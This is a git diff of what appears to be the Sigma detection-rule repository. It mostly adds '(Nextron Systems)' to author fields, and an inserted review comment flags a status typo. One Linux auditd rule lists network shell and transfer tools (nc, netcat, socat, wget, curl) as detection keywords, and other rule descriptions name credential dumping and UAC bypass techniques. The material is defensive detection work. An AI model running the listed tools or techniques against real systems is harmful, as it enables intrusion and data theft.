.../proc_creation_win_susp_wmic_execution.yml | 2 +- .../proc_creation_win_susp_wmic_proc_create.yml | 2 +- .../proc_creation_win_susp_wuauclt_cmdline.yml | 2 +- .../proc_creation_win_sysinternals_psservice.yml | 2 +- .../proc_creation_win_sysmon_disable_sharpevtmute.yml | 2 +- .../proc_creation_win_sysmon_exploitation.yml | 2 +- .../proc_creation_win_sysmon_uac_bypass_eventvwr.yml | 2 +- .../process_creation/proc_creation_win_sysnative.yml | 2 +- .../proc_creation_win_system_exe_anomaly.yml | 2 +- ...roc_creation_win_tamper_defender_remove_mppreference.yml | 2 +- .../proc_creation_win_termserv_proc_spawn.yml | 2 +- .../process_creation/proc_creation_win_tool_nircmd.yml | 2 +- .../proc_creation_win_tool_nircmd_as_system.yml | 2 +- .../proc_creation_win_tool_nsudo_execution.yml | 2 +- .../proc_creation_win_tool_runx_as_system.yml | 2 +- .../proc_creation_win_tools_relay_attacks.yml | 2 +- .../proc_creation_win_tools_uac_bypass_computerdefaults.yml | 2 +- 
.../proc_creation_win_turn_on_dev_features.yml | 2 +- .../proc_creation_win_uac_bypass_changepk_slui.yml | 2 +- .../proc_creation_win_uac_bypass_cleanmgr.yml | 2 +- .../proc_creation_win_uac_bypass_consent_comctl32.yml | 2 +- .../proc_creation_win_uac_bypass_dismhost.yml | 2 +- .../proc_creation_win_uac_bypass_eventvwr.yml | 2 +- .../proc_creation_win_uac_bypass_icmluautil.yml | 2 +- .../proc_creation_win_uac_bypass_idiagnostic_profile.yml | 2 +- .../proc_creation_win_uac_bypass_ieinstal.yml | 2 +- .../proc_creation_win_uac_bypass_msconfig_gui.yml | 2 +- .../proc_creation_win_uac_bypass_ntfs_reparse_point.yml | 2 +- .../proc_creation_win_uac_bypass_pkgmgr_dism.yml | 2 +- .../proc_creation_win_uac_bypass_winsat.yml | 2 +- .../process_creation/proc_creation_win_uac_bypass_wmp.yml | 2 +- ...proc_creation_win_uac_bypass_wsreset_integrity_level.yml | 2 +- .../proc_creation_win_user_discovery_get_aduser.yml | 2 +- ...proc_creation_win_using_set_service_to_hide_services.yml | 2 +- .../proc_creation_win_vscode_child_processes_anomalies.yml | 2 +- .../proc_creation_win_vul_java_remote_debugging.yml | 2 +- ...creation_win_wab_execution_from_non_default_location.yml | 2 +- .../proc_creation_win_wab_unusual_parents.yml | 2 +- .../proc_creation_win_weak_or_abused_passwords.yml | 2 +- .../process_creation/proc_creation_win_webshell_chopper.yml | 2 +- .../proc_creation_win_webshell_detection.yml | 2 +- .../process_creation/proc_creation_win_webshell_hacking.yml | 2 +- .../process_creation/proc_creation_win_webshell_spawn.yml | 2 +- .../process_creation/proc_creation_win_wevtutil_recon.yml | 2 +- .../proc_creation_win_whoami_as_priv_user.yml | 2 +- .../process_creation/proc_creation_win_whoami_priv.yml | 2 +- .../proc_creation_win_windows_terminal_susp_children.yml | 2 +- ...c_creation_win_wmi_backdoor_exchange_transport_agent.yml | 2 +- .../proc_creation_win_wmic_computersystem_recon.yml | 2 +- .../process_creation/proc_creation_win_wmic_hotfix_enum.yml | 2 +- 
.../proc_creation_win_wmic_security_product_uninstall.yml | 2 +- .../process_creation/proc_creation_win_wmic_service.yml | 2 +- .../proc_creation_win_wmic_unquoted_service_search.yml | 2 +- .../proc_creation_win_wpbbin_persistence.yml | 2 +- .../proc_creation_win_wscript_shell_cli.yml | 2 +- .../proc_creation_win_wsl_child_processes_anomalies.yml | 2 +- .../proc_creation_win_wsudo_susp_execution.yml | 2 +- .../proc_creation_win_wusa_susp_cab_extraction.yml | 2 +- ...reation_win_wusa_susp_cap_extraction_from_susp_paths.yml | 2 +- .../windows/process_creation/proc_creation_win_xordump.yml | 2 +- .../registry_add_amsi_providers_persistence.yml | 2 +- ...istry_add_disk_cleanup_handler_new_entry_persistence.yml | 2 +- .../registry_add_renamed_sysinternals_eula_accepted.yml | 2 +- .../registry_add_susp_sysinternals_eula_accepted.yml | 2 +- .../registry_delete_exploit_guard_protected_folders.yml | 2 +- .../registry_delete_mstsc_history_cleared.yml | 2 +- ...istry_delete_removal_index_value_scheduled_task_hide.yml | 2 +- .../registry_event/registry_event_add_local_hidden_user.yml | 2 +- .../registry_event/registry_event_apt_chafer_mar18.yml | 2 +- .../registry/registry_event/registry_event_apt_pandemic.yml | 2 +- .../registry/registry_event/registry_event_hack_wce_reg.yml | 2 +- .../registry_event/registry_event_net_ntlm_downgrade.yml | 2 +- .../registry_event_shell_open_keys_manipulation.yml | 2 +- .../registry_event_silentprocessexit_lsass.yml | 2 +- .../registry_event_stickykey_like_backdoor.yml | 2 +- .../registry_event/registry_event_susp_download_run_key.yml | 2 +- .../registry_event/registry_event_susp_lsass_dll_load.yml | 2 +- .../registry_set/registry_set_aedebug_persistence.yml | 2 +- .../registry/registry_set/registry_set_amsi_com_hijack.yml | 2 +- .../registry_set/registry_set_crashdump_disabled.yml | 2 +- .../registry_set_creation_service_susp_folder.yml | 2 +- .../registry_set_creation_service_uncommon_folder.yml | 2 +- 
.../registry_set_cve_2020_1048_new_printer_port.yml | 2 +- .../registry_set/registry_set_defender_exclusions.yml | 2 +- .../registry_set_disable_autologger_sessions.yml | 2 +- .../registry_set_disable_macroruntimescanscope.yml | 2 +- .../registry_set_disabled_microsoft_defender_eventlog.yml | 2 +- ...egistry_set_disk_cleanup_handler_autorun_persistence.yml | 2 +- .../registry_set/registry_set_dns_serverlevelplugindll.yml | 2 +- .../registry_set_exploit_guard_susp_allowed_apps.yml | 2 +- .../registry_set_hangs_debugger_persistence.yml | 2 +- .../registry_set/registry_set_hhctrl_persistence.yml | 2 +- .../registry_set_hide_scheduled_task_via_index_tamper.yml | 2 +- .../registry/registry_set/registry_set_mal_adwind.yml | 2 +- .../registry_set/registry_set_new_network_provider.yml | 2 +- .../registry_set_outlook_registry_todaypage.yml | 2 +- .../registry_set/registry_set_outlook_registry_webview.yml | 2 +- .../registry_set/registry_set_persistence_app_paths.yml | 2 +- .../registry_set/registry_set_persistence_autodial_dll.yml | 2 +- .../registry/registry_set/registry_set_persistence_chm.yml | 2 +- ...egistry_set_persistence_com_hijacking_susp_locations.yml | 2 +- .../registry_set_persistence_custom_protocol_handler.yml | 2 +- .../registry_set/registry_set_persistence_ifilter.yml | 2 +- .../registry_set/registry_set_persistence_lsa_extension.yml | 2 +- .../registry_set/registry_set_persistence_mpnotify.yml | 2 +- .../registry_set/registry_set_persistence_mycomputer.yml | 2 +- .../registry_set_persistence_natural_language.yml | 2 +- .../registry_set/registry_set_persistence_typed_paths.yml | 2 +- .../registry_set_policies_associations_tamper.yml | 2 +- .../registry_set_policies_attachments_tamper.yml | 2 +- .../registry_set_powershell_execution_policy.yml | 2 +- .../registry_set_renamed_sysinternals_eula_accepted.yml | 2 +- .../registry_set/registry_set_rpcrt4_etw_tamper.yml | 2 +- .../registry_set/registry_set_services_etw_tamper.yml | 2 +- 
.../registry/registry_set/registry_set_sip_persistence.yml | 2 +- .../registry_set/registry_set_sophos_av_tamaper.yml | 2 +- .../registry/registry_set/registry_set_special_accounts.yml | 2 +- .../registry_set/registry_set_susp_keyboard_layout_load.yml | 2 +- .../registry_set/registry_set_susp_printer_driver.yml | 2 +- .../registry_set_susp_reg_persist_explorer_run.yml | 2 +- .../registry_set/registry_set_susp_run_key_img_folder.yml | 2 +- .../registry_set/registry_set_suspicious_env_variables.yml | 2 +- .../registry_set/registry_set_turn_on_dev_features.yml | 2 +- .../registry_set/registry_set_uac_bypass_eventvwr.yml | 2 +- .../registry/registry_set/registry_set_uac_bypass_sdclt.yml | 2 +- .../registry_set/registry_set_uac_bypass_winsat.yml | 2 +- .../registry/registry_set/registry_set_uac_bypass_wmp.yml | 2 +- .../registry_set/registry_set_vbs_payload_stored.yml | 2 +- .../registry_set_winlogon_allow_multiple_tssessions.yml | 2 +- rules/windows/sysmon/sysmon_file_block_exe.yml | 2 +- rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml | 2 +- rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml | 2 +- tools/sigma/backends/elasticsearch.py | 2 +- tools/sigma/backends/humio.py | 2 +- tools/sigma/backends/opensearch.py | 2 +- tools/sigma/backends/powershell.py | 2 +- tools/sigma/backends/splunk.py | 2 +- tools/sigma/backends/sumologic.py | 2 +- 1063 files changed, 1066 insertions(+), 1066 deletions(-)
diff --git a/other/godmode_sigma_rule.yml b/other/godmode_sigma_rule.yml
index 9d017bc40..1288301ad 100644
--- a/other/godmode_sigma_rule.yml
+++ b/other/godmode_sigma_rule.yml
@@ -17,7 +17,7 @@ title: Godmode Sigma Rule
 id: def6caac-a999-4fc9-8800-cfeff700ba98
 description: 'PoC rule to detect malicious activity - following the principle: if you had only one shot, what would you look for?'
 status: experimental
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/12/22
 modified: 2022/08/04
 level: high
diff --git a/rules-deprecated/windows/file_event_win_hktl_createminidump.yml b/rules-deprecated/windows/file_event_win_hktl_createminidump.yml
index dafefbb83..5f6fd631b 100644
--- a/rules-deprecated/windows/file_event_win_hktl_createminidump.yml
+++ b/rules-deprecated/windows/file_event_win_hktl_createminidump.yml
@@ -5,7 +5,7 @@ related:
 - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d
 type: derived
 description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 references:
 - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
 date: 2019/12/22
diff --git a/rules-deprecated/windows/posh_ps_invoke_nightmare.yml b/rules-deprecated/windows/posh_ps_invoke_nightmare.yml
index cdefb1c68..80469031b 100644
--- a/rules-deprecated/windows/posh_ps_invoke_nightmare.yml
+++ b/rules-deprecated/windows/posh_ps_invoke_nightmare.yml
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects Commandlet name for PrintNightmare exploitation.
 references:
 - https://github.com/calebstewart/CVE-2021-1675
-author: Max Altgelt, Tobias Michalski
+author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)
 date: 2021/08/09
 modified: 2023/01/02
 tags:
diff --git a/rules-deprecated/windows/powershell_suspicious_download.yml b/rules-deprecated/windows/powershell_suspicious_download.yml
index 4ae8d7ae9..6308b39cc 100644
--- a/rules-deprecated/windows/powershell_suspicious_download.yml
+++ b/rules-deprecated/windows/powershell_suspicious_download.yml
@@ -5,7 +5,7 @@ description: Detects suspicious PowerShell download command
 tags:
 - attack.execution
 - attack.t1059.001
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2022/04/11
 logsource:
diff --git a/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml b/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml
index 2acdc5b8d..a9cbabd20 100644
--- a/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml
+++ b/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml
@@ -5,7 +5,7 @@ description: Detects suspicious PowerShell invocation command parameters
 tags:
 - attack.execution
 - attack.t1059.001
-author: Florian Roth (rule)
+author: Florian Roth (Nextron Systems)
 date: 2017/03/12
 modified: 2022/04/11
 logsource:
diff --git a/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml b/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml
index a4e817aaf..4e410a901 100644
--- a/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml
+++ b/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml
@@ -5,7 +5,7 @@ description: Detects suspicious PowerShell invocation command parameters
 tags:
 - attack.execution
 - attack.t1059.001
-author: Florian Roth (rule), Jonhnathan Ribeiro
+author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
 date: 2017/03/05
 modified: 2022/04/11
 logsource:
diff --git a/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml b/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml
index 35f1045cb..3f5f04180 100644
--- a/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml
+++ b/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml
@@ -2,7 +2,7 @@ title: MavInject Process Injection
 id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8
 status: deprecated
 description: Detects process injection using the signed Windows tool Mavinject32.exe
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 references:
 - https://twitter.com/gN3mes1s/status/941315826107510784
 - https://reaqta.com/2017/12/mavinject-microsoft-injector/
diff --git a/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml
index eb5ff39e7..ed280464b 100644
--- a/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml
+++ b/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml
@@ -7,7 +7,7 @@ status: deprecated
 description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets
 references:
 - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
-author: pH-T
+author: pH-T (Nextron Systems)
 date: 2022/05/31
 modified: 2023/01/30
 tags:
diff --git a/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml
index 23de7607d..64bea98a4 100644
--- a/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml
+++ b/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects base64 encoded listing Win32_Shadowcopy
 references:
 - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
-author: Christian Burkard
+author: Christian Burkard (Nextron Systems)
 date: 2022/03/01
 modified: 2023/01/30
 tags:
diff --git a/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml b/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml
index 7824df9b1..f6c5b661b 100644
--- a/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml
+++ b/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects the execution of a renamed PowerShell often used by attackers or malware
 references:
 - https://twitter.com/christophetd/status/1164506034720952320
-author: Florian Roth, frack113
+author: Florian Roth (Nextron Systems), frack113
 date: 2019/08/22
 modified: 2023/01/18
 tags:
diff --git a/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml b/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml
index 9f764d59d..cbe42f5e1 100644
--- a/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml
+++ b/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml
@@ -4,7 +4,7 @@ status: depreactaed
 description: Detects the execution of a renamed PsExec often used by attackers or malware
 references:
 - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2019/05/21
 modified: 2023/01/18
 tags:
diff --git a/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml b/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml
index b53f2dbb0..da901b5d6 100644
--- a/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml
+++ b/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml
@@ -4,7 +4,7 @@ status: deprecated
 description: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection
 references:
 - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/06/08
 modified: 2023/01/18
 logsource:
diff --git a/rules-deprecated/windows/registry_set_silentprocessexit.yml b/rules-deprecated/windows/registry_set_silentprocessexit.yml
index bc15e77d6..919ddb7ea 100644
--- a/rules-deprecated/windows/registry_set_silentprocessexit.yml
+++ b/rules-deprecated/windows/registry_set_silentprocessexit.yml
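Review bot: The hunk header for proc_creation_win_renamed_psexec.yml shows `status: depreactaed`, a misspelling that this metadata pass leaves untouched even though the same file is being edited; `deprecated` is the recognized value, and any tooling that filters or validates rules by the status field rather than by directory may not treat this rule as deprecated. Since the file is already in the commit, the fix is a one-line drive-by: `status: deprecated`. The status line sits just above the hunk's first context line, and the rest of the rule body is outside the hunk.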
@@ -5,7 +5,7 @@ description: Detects changes to the Registry in which a monitor program gets reg
 references:
 - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
 - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/02/26
 modified: 2022/12/19
 tags:
diff --git a/rules-deprecated/windows/win_susp_esentutl_activity.yml b/rules-deprecated/windows/win_susp_esentutl_activity.yml
index 3d658fea4..731281958 100644
--- a/rules-deprecated/windows/win_susp_esentutl_activity.yml
+++ b/rules-deprecated/windows/win_susp_esentutl_activity.yml
@@ -2,7 +2,7 @@ title: Suspicious Esentutl Use
 id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7
 status: deprecated
 description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/05/23
 modified: 2022/04/11
 references:
diff --git a/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml b/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml
index 3eeef68a1..b3d5a0a3d 100644
--- a/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml
+++ b/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml
@@ -2,7 +2,7 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval
 id: b932b60f-fdda-4d53-8eda-a170c1d97bbd
 status: deprecated
 description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely
-author: Florian Roth, Michael Haag
+author: Florian Roth (Nextron Systems), Michael Haag
 date: 2019/01/16
 modified: 2022/04/11
 references:
diff --git a/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml b/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml
index 21901949d..ecd0b9f93 100644
--- a/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml
+++ b/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml
@@ -2,7 +2,7 @@ title: Interactive Logon to Server Systems
 id: 3ff152b2-1388-4984-9cd9-a323323fdadf
 status: test
 description: Detects interactive console logons to Server Systems
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/17
 modified: 2021/11/27
 logsource:
diff --git a/rules-unsupported/win_mal_service_installs.yml b/rules-unsupported/win_mal_service_installs.yml
index 623c22029..78f7b9aec 100644
--- a/rules-unsupported/win_mal_service_installs.yml
+++ b/rules-unsupported/win_mal_service_installs.yml
@@ -1,7 +1,7 @@
 title: Malicious Service Installations
 id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a
 description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.
-author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update)
+author: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)
 date: 2017/03/27
 modified: 2022/03/21
 references:
diff --git a/rules/category/antivirus/av_exploiting.yml b/rules/category/antivirus/av_exploiting.yml
index 1305e9436..1c97cbb05 100644
--- a/rules/category/antivirus/av_exploiting.yml
+++ b/rules/category/antivirus/av_exploiting.yml
@@ -7,7 +7,7 @@ references:
 - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797
 - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424
 - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2018/09/09
 modified: 2023/01/13
 tags:
diff --git a/rules/category/antivirus/av_hacktool.yml b/rules/category/antivirus/av_hacktool.yml
index 42d153ae3..cf5ede7f8 100644
--- a/rules/category/antivirus/av_hacktool.yml
+++ b/rules/category/antivirus/av_hacktool.yml
@@ -5,7 +5,7 @@ description: Detects a highly relevant Antivirus alert that reports a hack tool
 references:
 - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/
 - https://www.nextron-systems.com/?s=antivirus
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2021/08/16
 modified: 2023/01/13
 tags:
diff --git a/rules/category/antivirus/av_password_dumper.yml b/rules/category/antivirus/av_password_dumper.yml
index fc6d7700e..05ed559e0 100644
--- a/rules/category/antivirus/av_password_dumper.yml
+++ b/rules/category/antivirus/av_password_dumper.yml
@@ -6,7 +6,7 @@ references:
 - https://www.nextron-systems.com/?s=antivirus
 - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619
 - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/09/09
 modified: 2023/01/18
 tags:
diff --git a/rules/category/antivirus/av_ransomware.yml b/rules/category/antivirus/av_ransomware.yml
index 71f2d62aa..c039c5b5e 100644
--- a/rules/category/antivirus/av_ransomware.yml
+++ b/rules/category/antivirus/av_ransomware.yml
@@ -9,7 +9,7 @@ references:
 - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045
 - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d
 - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2022/05/12
 modified: 2023/01/13
 tags:
diff --git a/rules/category/antivirus/av_relevant_files.yml b/rules/category/antivirus/av_relevant_files.yml
index 635e09f50..01fd2e9e2 100644
--- a/rules/category/antivirus/av_relevant_files.yml
+++ b/rules/category/antivirus/av_relevant_files.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name
 references:
 - https://www.nextron-systems.com/?s=antivirus
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2018/09/09
 modified: 2023/01/13
 tags:
diff --git a/rules/category/antivirus/av_webshell.yml b/rules/category/antivirus/av_webshell.yml
index 21165013e..36f8943fd 100644
--- a/rules/category/antivirus/av_webshell.yml
+++ b/rules/category/antivirus/av_webshell.yml
@@ -13,7 +13,7 @@ references:
 - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection
 - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection
 - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection
-author: Florian Roth, Arnim Rupp
+author: Florian Roth (Nextron Systems), Arnim Rupp
 date: 2018/09/09
 modified: 2023/01/13
 tags:
diff --git a/rules/linux/auditd/lnx_auditd_coinminer.yml b/rules/linux/auditd/lnx_auditd_coinminer.yml
index 7a1cb7d05..fd45113d6 100644
--- a/rules/linux/auditd/lnx_auditd_coinminer.yml
+++ b/rules/linux/auditd/lnx_auditd_coinminer.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects command line parameter very often used with coin miners
 references:
 - https://xmrig.com/docs/miner/command-line-options
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/09
 modified: 2022/12/25
 tags:
diff --git a/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml
index 1bf6b82b3..7c2f8de74 100644
--- a/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml
+++ b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml
@@ -2,9 +2,9 @@ title: Suspicious C2 Activities
 id: f7158a64-6204-4d6d-868a-6e6378b467e0
 status: test
 description: |
- Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.
- This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.
- These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
+ Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.
+ This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.
+ These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)
 references:
 - 'https://github.com/Neo23x0/auditd'
 author: Marie Euler
diff --git a/rules/linux/auditd/lnx_auditd_susp_cmds.yml b/rules/linux/auditd/lnx_auditd_susp_cmds.yml
index fe42ea2dc..2845a12e1 100644
--- a/rules/linux/auditd/lnx_auditd_susp_cmds.yml
+++ b/rules/linux/auditd/lnx_auditd_susp_cmds.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects relevant commands often related to malware or hacking activity
 references:
 - Internal Research - mostly derived from exploit code including code in MSF
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/12/12
 modified: 2022/10/05
 tags:
diff --git a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml
index 41e50458c..86b4ea4f8 100644
--- a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml
+++ b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects program executions in suspicious non-program folders related to malware or hacking activity
 references:
 - Internal Research
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/01/23
 modified: 2021/11/27
 tags:
@@ -20,7 +20,7 @@ detection:
 exe|startswith:
 # Temporary folder
 - '/tmp/'
- # Web server
+ # Web server
 - '/var/www/' # Standard
 - '/home/*/public_html/' # Per-user
 - '/usr/local/apache2/' # Classical Apache
diff --git a/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml b/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml
index 68481e604..29a30f6ca 100644
--- a/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml
+++ b/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml
@@ -2,7 +2,7 @@ title: Failed Logins with Different Accounts from Single Source - Linux
 id: fc947f8e-ea81-4b14-9a7b-13f888f94e18
 status: test
 description: Detects suspicious failed logins with different user accounts from a single source system
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/02/16
 modified: 2022/11/26
 tags:
diff --git a/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml b/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml
index bc75eea23..43da1ba42 100644
--- a/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml
+++ b/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects relevant ClamAV messages
 references:
 - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/01
 tags:
 - attack.resource_development
diff --git a/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml b/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml
index 23d523acf..616740cba 100644
--- a/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml
+++ b/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious session with two users present
 references:
 - https://research.checkpoint.com/2020/apache-guacamole-rce/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2020/07/03
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml b/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml
index bff668189..3022534da 100755
--- a/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml
+++ b/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects suspicious shell commands used in various Equation Group scripts and tools
 references:
 - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/04/09
 modified: 2021/11/27
 tags:
diff --git a/rules/linux/builtin/lnx_buffer_overflows.yml b/rules/linux/builtin/lnx_buffer_overflows.yml
index 1304e4b30..17bb8612f 100644
--- a/rules/linux/builtin/lnx_buffer_overflows.yml
+++ b/rules/linux/builtin/lnx_buffer_overflows.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects buffer overflow attempts in Unix system log files
 references:
